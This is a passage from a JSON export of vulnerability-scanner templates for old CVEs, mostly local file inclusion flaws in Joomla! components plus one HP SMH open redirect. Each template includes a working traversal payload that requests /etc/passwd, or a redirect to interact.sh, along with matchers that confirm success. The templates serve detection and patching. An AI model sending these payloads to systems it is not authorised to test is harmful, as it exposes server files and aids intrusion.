CVE-2010-1533\n cwe-id: CWE-22\n epss-score: 0.00706\n epss-percentile: 0.79951\n cpe: cpe:2.3:a:peter_hocherl:com_tweetla:1.0.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: peter_hocherl\n product: com_tweetla\n tags: cve2010,cve,joomla,lfi,edb,peter_hocherl\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100eedf4edbfe23d403bdd5c5489b678f09c60e2a4eb686e7fa5f90c08137b92d54022100e22396a012f39f1ae9f4950b22031a7521a366a61411f98a4f3323782f5e2eaa:922c64590222798bb761d5b6d8e72950", "hash": "b5d1ea9484b31f176f77ddf0eb8c57d1", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e93" }, "name": "CVE-2010-1534.yaml", "content": "id: CVE-2010-1534\n\ninfo:\n name: Joomla! Component Shoutbox Pro - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the Shoutbox Pro (com_shoutbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n remediation: Upgrade to a supported version\n reference:\n - https://www.exploit-db.com/exploits/12067\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1534\n - http://www.exploit-db.com/exploits/12067\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57534\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1534\n cwe-id: CWE-22\n epss-score: 0.01385\n epss-percentile: 0.86058\n cpe: cpe:2.3:a:joomla.batjo:com_shoutbox:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joomla.batjo\n product: com_shoutbox\n tags: cve2010,cve,joomla,lfi,edb,joomla.batjo\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022040ad70967db9eabb2f9a61956bb22a2cb03a60da3fd695753b8fc46da9eb48e3022071b38622330ce4f8a704bb116b35a8279a76512268663ad681d5360a49288372:922c64590222798bb761d5b6d8e72950", "hash": "96bea42c3ed03ccfd3d13a53539ab0c5", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e94" }, "name": "CVE-2010-1535.yaml", "content": "id: CVE-2010-1535\n\ninfo:\n name: Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the TRAVELbook (com_travelbook) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: |\n Update to the latest version of Joomla! Component TRAVELbook or apply the necessary patches to fix the LFI vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12151\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1535\n - http://www.exploit-db.com/exploits/12151\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-1535\n cwe-id: CWE-22\n epss-score: 0.00706\n epss-percentile: 0.78254\n cpe: cpe:2.3:a:peter_hocherl:com_travelbook:1.0.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: peter_hocherl\n product: com_travelbook\n tags: cve,cve2010,joomla,lfi,edb,peter_hocherl\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502210081ae121f8d5b40c99be54953f4642587c68241fe48f2df08217c1a01ea61731502201393c0f1a4c9d6e00e2fd41022df88c7a15e3bc678a5eaf99634e69b735ab26a:922c64590222798bb761d5b6d8e72950", "hash": "76533935820717f306135a5c54f154d9", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e95" }, "name": "CVE-2010-1540.yaml", "content": "id: CVE-2010-1540\n\ninfo:\n name: Joomla! Component com_blog - Directory Traversal\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter.\n impact: |\n An attacker can access sensitive files on the server, potentially leading to unauthorized disclosure of sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by Joomla! to fix the directory traversal vulnerability in com_blog component.\n reference:\n - https://www.exploit-db.com/exploits/11625\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1540\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1540\n cwe-id: CWE-22\n epss-score: 0.0045\n epss-percentile: 0.72402\n cpe: cpe:2.3:a:myblog:com_myblog:3.0.329:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: myblog\n product: com_myblog\n tags: cve2010,cve,joomla,lfi,edb,myblog\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100853ab92a94122428ef783d809d2344f7e06f86bf4da63122b22b0a1e3a0d6e8c022100c6d26c261af1b18db84a007d7cb10ecc069fd53aa90a15ccc8ce97c046c6ad2c:922c64590222798bb761d5b6d8e72950", "hash": "ccb46ba111bcd6099855cd36e852add0", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e96" }, "name": "CVE-2010-1586.yaml", "content": "id: CVE-2010-1586\n\ninfo:\n name: HP System Management Homepage (SMH) v2.x.x.x - Open Redirect\n author: ctflearner\n severity: medium\n description: |\n Open redirect vulnerability in red2301.html in HP System Management Homepage (SMH) 2.x.x.x allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the RedirectUrl parameter.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks or the download of malware.\n remediation: |\n Apply the latest patches or updates provided by HP to fix the open redirect vulnerability.\n reference:\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1586\n - https://yehg.net/lab/pr0js/advisories/hp_system_management_homepage_url_redirection_abuse\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/58107\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2010-1586\n cwe-id: CWE-20\n epss-score: 0.00917\n epss-percentile: 0.81107\n cpe: cpe:2.3:a:hp:system_management_homepage:2.0.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: hp\n product: system_management_homepage\n tags: cve,cve2010,redirect,smh,hp\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/red2301.html?RedirectUrl=http://interact.sh\"\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$'\n# digest: 4b0a00483046022100f57a607443ab3d3afbecb32664f1d6143de739eaf0a9af290671f808ee175f33022100f241d17fa92db4be2755072bfe591fc4fe9d6dc10f24f02fecf152f383bc496f:922c64590222798bb761d5b6d8e72950", "hash": "5816de9f648fa3b25b2e9d685abb7975", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e97" }, "name": "CVE-2010-1601.yaml", "content": "id: CVE-2010-1601\n\ninfo:\n name: Joomla! Component JA Comment - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to read arbitrary files on the server, leading to unauthorized access and potential data leakage.\n remediation: |\n Apply the latest security patches or upgrade to a patched version of Joomla! Component JA Comment to mitigate the LFI vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12236\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1601\n - http://packetstormsecurity.org/1004-exploits/joomlajacomment-lfi.txt\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57848\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1601\n cwe-id: CWE-22\n epss-score: 0.01299\n epss-percentile: 0.84437\n cpe: cpe:2.3:a:joomlamart:com_jacomment:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joomlamart\n product: com_jacomment\n tags: cve,cve2010,joomla,lfi,edb,packetstorm,joomlamart\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502210097b2518e36f765bf1859fe172670ecd77886665cb539f4379bb250f6b6984e6a02207707d1856286f12c7923bf67ba75f1dcc7cc704a1603b96a498ca5e75ed2dbb4:922c64590222798bb761d5b6d8e72950", "hash": "c5a022e0c6db0c092977202465119f7a", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e98" }, "name": "CVE-2010-1602.yaml", "content": "id: CVE-2010-1602\n\ninfo:\n name: Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: |\n Update to the latest version of Joomla! Component ZiMB Comment or apply the provided patch to fix the LFI vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12283\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1602\n - http://packetstormsecurity.org/1004-exploits/joomlazimbcomment-lfi.txt\n - http://www.vupen.com/english/advisories/2010/0932\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-1602\n cwe-id: CWE-22\n epss-score: 0.03451\n epss-percentile: 0.91267\n cpe: cpe:2.3:a:zimbllc:com_zimbcomment:0.8.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: zimbllc\n product: com_zimbcomment\n tags: cve,cve2010,lfi,edb,packetstorm,joomla,zimbllc\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402205e094a51db98044850affaa030835374e20660764cfd65e9a367c5012aa6741c02207e065ab9927fef891678a4c7c425734e4e0c1c040f73d6e9a60c9ab7b3b9bfd2:922c64590222798bb761d5b6d8e72950", "hash": "003e13af87da41530d6ab2e122f614a1", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e99" }, "name": "CVE-2010-1603.yaml", "content": "id: CVE-2010-1603\n\ninfo:\n name: Joomla! Component ZiMBCore 0.1 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the ZiMB Core (aka ZiMBCore or com_zimbcore) component 0.1 in the ZiMB Manager collection for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12284\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1603\n - http://www.vupen.com/english/advisories/2010/0931\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-1603\n cwe-id: CWE-22\n epss-score: 0.03451\n epss-percentile: 0.91267\n cpe: cpe:2.3:a:zimbllc:com_zimbcore:0.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: zimbllc\n product: com_zimbcore\n tags: cve,cve2010,joomla,lfi,edb,zimbllc\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022054c49fc7d9cd0665b02bdd1416c1510b1752a4f06b6591edf9975587dbd9f87102202a6ac32dc8f19d3831f4ecb72f8145c38a2992e9219593c3b2d5ad99f3f36663:922c64590222798bb761d5b6d8e72950", "hash": "9e799cc42ff0fa6075910f73c733ad93", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e9a" }, "name": "CVE-2010-1607.yaml", "content": "id: CVE-2010-1607\n\ninfo:\n name: Joomla! Component WMI 1.5.0 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.\n remediation: |\n Update Joomla! Component WMI to the latest version or apply the provided patch to fix the LFI vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12316\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1607\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/58032\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2010-1607\n cwe-id: CWE-22\n epss-score: 0.01726\n epss-percentile: 0.87577\n cpe: cpe:2.3:a:paysyspro:com_wmi:1.5.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: paysyspro\n product: com_wmi\n tags: cve,cve2010,joomla,lfi,edb,paysyspro\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220671ba5beac4877f63605810ae5ba53e80578909ca33547f5bbc443a22f1920b2022100c4437f0060e149ac837e691a2ee6a12613e7a6ebfe5da8f49b5b52643d78af5c:922c64590222798bb761d5b6d8e72950", "hash": "e7057d59a17172f322f3f4f2954fca47", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e9b" }, "name": "CVE-2010-1653.yaml", "content": "id: CVE-2010-1653\n\ninfo:\n name: Joomla! Component Graphics 1.0.6 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in graphics.php in the Graphics (com_graphics) component 1.0.6 and 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n The LFI vulnerability can lead to unauthorized access to sensitive files, remote code execution, and compromise of the entire Joomla! installation.\n remediation: |\n Update Joomla! Component Graphics to the latest version or apply the patch provided by the vendor to mitigate the LFI vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12430\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1653\n - http://packetstormsecurity.org/1004-exploits/joomlagraphics-lfi.txt\n - http://www.vupen.com/english/advisories/2010/1004\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-1653\n cwe-id: CWE-22\n epss-score: 0.03527\n epss-percentile: 0.91355\n cpe: cpe:2.3:a:htmlcoderhelper:com_graphics:1.0.6:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: htmlcoderhelper\n product: com_graphics\n tags: cve,cve2010,edb,packetstorm,joomla,lfi,htmlcoderhelper\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502204ad756a9e16380e027261fee411718753cfd8cbd153d923afa480c57a77e943d022100be3f9d60f33c780dec7263782e438f10d46f59b0c77a82743874dd0e9c03f65f:922c64590222798bb761d5b6d8e72950", "hash": "65d1d5d89d703f53921baaa5a714b3d7", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e9c" }, "name": "CVE-2010-1657.yaml", "content": "id: CVE-2010-1657\n\ninfo:\n name: Joomla! Component SmartSite 1.0.0 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the SmartSite (com_smartsite) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: |\n Update to the latest version of Joomla! Component SmartSite or apply the necessary patches to fix the LFI vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1657\n - https://www.exploit-db.com/exploits/12428\n - http://www.vupen.com/english/advisories/2010/1006\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/58175\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1657\n cwe-id: CWE-22\n epss-score: 0.01751\n epss-percentile: 0.87665\n cpe: cpe:2.3:a:recly:com_smartsite:1.0.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: recly\n product: com_smartsite\n tags: cve,cve2010,joomla,lfi,edb,recly\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100bcb3752f3f8e24379ea159e6831ebe01f2da83a0d58232453372c79b86e08221022100ed629a46f18c172871595fe7120c9aeb0f2441da744b940c59461cde7c96719a:922c64590222798bb761d5b6d8e72950", "hash": "3bde8dddd89350a8fccc9318fe2401b0", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e9d" }, "name": "CVE-2010-1658.yaml", "content": "id: CVE-2010-1658\n\ninfo:\n name: Joomla! Component NoticeBoard 1.3 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can allow an attacker to read arbitrary files on the server, potentially leading to unauthorized access, sensitive information disclosure, or further attacks.\n remediation: |\n Update to the latest version of Joomla! Component NoticeBoard or apply the necessary patches to fix the LFI vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12427\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1658\n - http://www.vupen.com/english/advisories/2010/1007\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/58176\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1658\n cwe-id: CWE-22\n epss-score: 0.01751\n epss-percentile: 0.87665\n cpe: cpe:2.3:a:code-garage:com_noticeboard:1.3:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: code-garage\n product: com_noticeboard\n tags: cve,cve2010,joomla,lfi,edb,code-garage\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100d8786ea9146eb623bc2e6b94ff1ddfd987d8af333475bb9273ff1e2bd35ff26a02200fb7110b7f5395f71dee1c009e3dc058d633f521052cc4f3484c6f358684bbf8:922c64590222798bb761d5b6d8e72950", "hash": "91923b6ab0b4dde90c9b8fbc56e97637", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e9e" }, "name": "CVE-2010-1659.yaml", "content": "id: CVE-2010-1659\n\ninfo:\n name: Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the Ultimate Portfolio (com_ultimateportfolio) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation.\n remediation: |\n Apply the latest security patches or updates provided by the Joomla! project to fix the LFI vulnerability in Ultimate Portfolio 1.0 component.\n reference:\n - https://www.exploit-db.com/exploits/12426\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1659\n - http://www.exploit-db.com/exploits/12426\n - http://www.vupen.com/english/advisories/2010/1008\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/58177\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1659\n cwe-id: CWE-22\n epss-score: 0.01806\n epss-percentile: 0.86853\n cpe: cpe:2.3:a:webkul:com_ultimateportfolio:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: webkul\n product: com_ultimateportfolio\n tags: cve2010,cve,joomla,lfi,edb,webkul\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022044961916a557a8da30cac3ced56cc0b76c6ad56a135ccdeedda4e81e2bfea49e022027e20655fa3d414923eda4d6272299f0f4dd2cef72c8f74d3ba8b462a10c390a:922c64590222798bb761d5b6d8e72950", "hash": "94c1ff114b06f4b7857eebb56efedfdb", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e9f" }, "name": "CVE-2010-1714.yaml", "content": "id: CVE-2010-1714\n\ninfo:\n name: Joomla! Component Arcade Games 1.0 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n remediation: |\n Apply the latest security patches or updates provided by the Joomla! project to fix the LFI vulnerability in the Arcade Games component.\n reference:\n - https://www.exploit-db.com/exploits/12168\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1714\n - http://packetstormsecurity.org/1004-exploits/joomlaarcadegames-lfi.txt\n - http://www.vupen.com/english/advisories/2010/0860\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57683\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1714\n cwe-id: CWE-22\n epss-score: 0.01751\n epss-percentile: 0.86649\n cpe: cpe:2.3:a:dev.pucit.edu.pk:com_arcadegames:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: dev.pucit.edu.pk\n product: com_arcadegames\n tags: cve2010,cve,joomla,lfi,edb,packetstorm,dev.pucit.edu.pk\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100ae201cb424c48ebdbe9d704bfa0237570da160cdd6da7886365b2fbe9199bb6a0220327d67a86f6d0c7affd6e58e9bbb1ba78583b91c61cd70e92fd150c8bc9fd79f:922c64590222798bb761d5b6d8e72950", "hash": "9cc6a650bc918c252d71747e1cae27c8", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ea0" }, "name": "CVE-2010-1715.yaml", "content": "id: CVE-2010-1715\n\ninfo:\n name: Joomla! Component Online Exam 1.5.0 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the Online Examination (aka Online Exam or com_onlineexam) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n remediation: |\n Update to the latest version of Joomla! Component Online Exam and apply any available patches or security updates.\n reference:\n - https://www.exploit-db.com/exploits/12174\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1715\n - http://packetstormsecurity.org/1004-exploits/joomlaonlineexam-lfi.txt\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57677\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2010-1715\n cwe-id: CWE-22\n epss-score: 0.01242\n epss-percentile: 0.83996\n cpe: cpe:2.3:a:pucit.edu:com_onlineexam:1.5.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: pucit.edu\n product: com_onlineexam\n tags: cve,cve2010,joomla,lfi,edb,packetstorm,pucit.edu\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100c47a4bdd67634653ce4da4af40c81205ffdcc542bbe4c92693d10063b0f15a6a02202182f5b7abe3de71edc4955d26840eeaaa624feab87fc896bee09c8bb5f97b8f:922c64590222798bb761d5b6d8e72950", "hash": "e8bd82c86c13df14eb4a6c89055c388a", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ea1" }, "name": "CVE-2010-1717.yaml", "content": "id: CVE-2010-1717\n\ninfo:\n name: Joomla! Component iF surfALERT 1.2 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the iF surfALERT (com_if_surfalert) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.\n remediation: |\n Apply the latest patch or upgrade to a newer version of the Joomla! Component iF surfALERT to mitigate the LFI vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12291\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1717\n - http://www.vupen.com/english/advisories/2010/0924\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Live-Hack-CVE/CVE-2010-1717\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-1717\n cwe-id: CWE-22\n epss-score: 0.01733\n epss-percentile: 0.87598\n cpe: cpe:2.3:a:if_surfalert_project:if_surfalert:1.2:*:*:*:*:joomla\\!:*:*\n metadata:\n max-request: 1\n vendor: if_surfalert_project\n product: if_surfalert\n framework: joomla\\!\n tags: cve,cve2010,joomla,lfi,edb,if_surfalert_project,joomla\\!\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100d077e7a8b82e5dacdc61932a6699b6f16fe3599d2fe585624ab67c61dbf65ad9022100815c9cafcb46abe0609189924d5076416102570d3f3a4801a745b86b82a64336:922c64590222798bb761d5b6d8e72950", "hash": "ef3b58e41620b909fe21380380246ff7", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ea2" }, "name": "CVE-2010-1718.yaml", "content": "id: CVE-2010-1718\n\ninfo:\n name: Joomla! Component Archery Scores 1.0.6 - Local File Inclusion\n author: daffainfo\n severity: 